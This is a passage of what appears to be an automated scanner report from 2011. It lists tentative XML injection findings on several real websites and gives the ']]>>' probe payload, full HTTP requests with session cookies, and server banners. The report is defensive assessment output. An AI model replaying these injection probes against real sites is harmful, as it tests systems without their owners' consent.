<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>1CD65E5EA0829312</RequestId><HostId>f8qBMqCIxhvl+G+aGphUQEbhL8KMAu6I1Z6xXWRbxLX1idZlkl
...[SNIP]...

8.60. http://trk.cetrk.com/t.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://trk.cetrk.com
Path:   /t.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /t.js]]>>?s=146645&t=1305489673665 HTTP/1.1
Host: trk.cetrk.com
Proxy-Connection: keep-alive
Referer: http://tweetbeat.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 403 Forbidden
x-amz-request-id: 5FF999DFDB9F9A64
x-amz-id-2: X2JJhxevvL0qZP7bBgaIN1dtuMjQMNp2J4QDXnHg4yqTZHfj+mtXiOJwhA0ZOXWc
Content-Type: application/xml
Date: Sun, 15 May 2011 20:04:37 GMT
Server: AmazonS3
Content-Length: 231

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5FF999DFDB9F9A64</RequestId><HostId>X2JJhxevvL0qZP7bBgaIN1dtuMjQMNp2J4QDXnHg4yqTZHfj+m
...[SNIP]...

8.61. http://www.kol.co.nz/css/ie_hacks.css [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kol.co.nz
Path:   /css/ie_hacks.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css]]>>/ie_hacks.css HTTP/1.1
Host: www.kol.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=11577963.1305480320.1.1.utmcsr=orcon.net.nz|utmccn=(referral)|utmcmd=referral|utmcct=/about/browse/category/acquisitions/; __utma=11577963.112339897.1305480320.1305480320.1305480320.1; __utmc=11577963; __utmb=11577963.1.10.1305480320;

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:40:27 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Length: 5754
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script src="http://www.kol.co.nz/js/zxml.js" type="text/javascript" language="javascript">
...[SNIP]...

8.62. http://www.kol.co.nz/css/ie_hacks.css [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kol.co.nz
Path:   /css/ie_hacks.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css/ie_hacks.css]]>> HTTP/1.1
Host: www.kol.co.nz
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=11577963.1305480320.1.1.utmcsr=orcon.net.nz|utmccn=(referral)|utmcmd=referral|utmcct=/about/browse/category/acquisitions/; __utma=11577963.112339897.1305480320.1305480320.1305480320.1; __utmc=11577963; __utmb=11577963.1.10.1305480320;

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:40:43 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Length: 5754
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script src="http://www.kol.co.nz/js/zxml.js" type="text/javascript" language="javascript">
...[SNIP]...

8.63. http://www.kol.co.nz/css/print.css [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kol.co.nz
Path:   /css/print.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css]]>>/print.css HTTP/1.1
Host: www.kol.co.nz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kol.co.nz/

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:41:00 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script src="http://www.kol.co.nz/js/zxml.js" type="text/javascript" language="javascript">
...[SNIP]...

8.64. http://www.kol.co.nz/css/print.css [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kol.co.nz
Path:   /css/print.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css/print.css]]>> HTTP/1.1
Host: www.kol.co.nz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kol.co.nz/

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:41:44 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script src="http://www.kol.co.nz/js/zxml.js" type="text/javascript" language="javascript">
...[SNIP]...

8.65. http://www.kol.co.nz/css/stylev1.53.css [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kol.co.nz
Path:   /css/stylev1.53.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css]]>>/stylev1.53.css?cachebreaker=09062010 HTTP/1.1
Host: www.kol.co.nz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kol.co.nz/

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:28:34 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script src="http://www.kol.co.nz/js/zxml.js" type="text/javascript" language="javascript">
...[SNIP]...

8.66. http://www.kol.co.nz/css/stylev1.53.css [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kol.co.nz
Path:   /css/stylev1.53.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /css/stylev1.53.css]]>>?cachebreaker=09062010 HTTP/1.1
Host: www.kol.co.nz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kol.co.nz/

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:29:17 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script src="http://www.kol.co.nz/js/zxml.js" type="text/javascript" language="javascript">
...[SNIP]...

8.67. http://www.kol.co.nz/js/domfunction.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kol.co.nz
Path:   /js/domfunction.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js]]>>/domfunction.js HTTP/1.1
Host: www.kol.co.nz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kol.co.nz/

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:40:39 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script src="http://www.kol.co.nz/js/zxml.js" type="text/javascript" language="javascript">
...[SNIP]...

8.68. http://www.kol.co.nz/js/domfunction.js [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kol.co.nz
Path:   /js/domfunction.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js/domfunction.js]]>> HTTP/1.1
Host: www.kol.co.nz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kol.co.nz/

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:41:22 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script src="http://www.kol.co.nz/js/zxml.js" type="text/javascript" language="javascript">
...[SNIP]...

8.69. http://www.kol.co.nz/js/utils.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kol.co.nz
Path:   /js/utils.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js]]>>/utils.js HTTP/1.1
Host: www.kol.co.nz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kol.co.nz/

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:40:39 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script src="http://www.kol.co.nz/js/zxml.js" type="text/javascript" language="javascript">
...[SNIP]...

8.70. http://www.kol.co.nz/js/utils.js [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kol.co.nz
Path:   /js/utils.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /js/utils.js]]>> HTTP/1.1
Host: www.kol.co.nz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.kol.co.nz/

Response

HTTP/1.1 404 Not Found
Date: Sun, 15 May 2011 17:41:22 GMT
Server: Apache/2.2.3 (Debian) PHP/5.2.6-1+lenny2 with Suhosin-Patch mod_ssl/2.2.3 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny2
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 5754


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<script src="http://www.kol.co.nz/js/zxml.js" type="text/javascript" language="javascript">
...[SNIP]...

8.71. http://www.kosmix.com/c-javascripts/kapp_relevance.js [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /c-javascripts/kapp_relevance.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /c-javascripts]]>>/kapp_relevance.js?1302816008 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:12 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=c-javascripts%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:12 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:12 GMT;path=/
Content-Length: 16275

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.72. http://www.kosmix.com/c-javascripts/kapp_relevance.js [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /c-javascripts/kapp_relevance.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /c-javascripts/kapp_relevance.js]]>>?1302816008 HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990; last_referrer=

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:05:31 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=c-javascripts; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:05:31 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:07:31 GMT;path=/
Content-Length: 16297

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.73. http://www.kosmix.com/images/ck.txt [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /images/ck.txt

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/ck.txt?pvid=454012985&s=f062f6f0-615b-012e-931e-003048fe4cb2&ckid=1086031566&m=footer&r=1010200&c=1&ct=staticclick&x=806&y=923&v=29&p=site_footer HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; last_referrer=; __utmz=33745467.1305489647.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=33745467.1661155596.1305489647.1305489647.1305489647.1; __utmc=33745467; __utmb=33745467.1.10.1305489647; __qca=P0-1290282890-1305489649089; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:15:24 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=images%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:15:24 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:17:24 GMT;path=/
Content-Length: 16494

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.74. http://www.kosmix.com/images/ck.txt [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /images/ck.txt

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/ck.txt]]>>?pvid=454012985&s=f062f6f0-615b-012e-931e-003048fe4cb2&ckid=1086031566&m=footer&r=1010200&c=1&ct=staticclick&x=806&y=923&v=29&p=site_footer HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Referer: http://www.kosmix.com/
X-Prototype-Version: 1.6.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; last_referrer=; __utmz=33745467.1305489647.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=33745467.1661155596.1305489647.1305489647.1305489647.1; __utmc=33745467; __utmb=33745467.1.10.1305489647; __qca=P0-1290282890-1305489649089; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:15:41 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:15:41 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:17:41 GMT;path=/
Content-Length: 16520

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.75. http://www.kosmix.com/images/favicon.ico [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /images/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images]]>>/favicon.ico HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; last_referrer=; __utmz=33745467.1305489647.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=33745467.1661155596.1305489647.1305489647.1305489647.1; __utmc=33745467; __utmb=33745467.1.10.1305489647; __qca=P0-1290282890-1305489649089; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:07:53 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=images%5D%5D%3E%3E; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:07:53 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:09:53 GMT;path=/
Content-Length: 16057

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang
...[SNIP]...

8.76. http://www.kosmix.com/images/favicon.ico [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.kosmix.com
Path:   /images/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /images/favicon.ico]]>> HTTP/1.1
Host: www.kosmix.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: kid=f062f6f0-615b-012e-931e-003048fe4cb2; as=ref_absent; last_referrer=; __utmz=33745467.1305489647.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=33745467.1661155596.1305489647.1305489647.1305489647.1; __utmc=33745467; __utmb=33745467.1.10.1305489647; __qca=P0-1290282890-1305489649089; NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 20:08:10 GMT
Status: 200 OK
Content-Type: text/html
Set-Cookie: iq=images; path=/
Cache-Control: max-age=14400
Expires: Mon, 16 May 2011 00:08:10 GMT
Vary: Accept-Encoding
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff090417b745525d5f4f58455e445a4a423990;expires=Sun, 15-May-2011 20:10:10 GMT;path=/
Content-Length: 16080

<?xml version="1.0" encoding="utf-8"?>
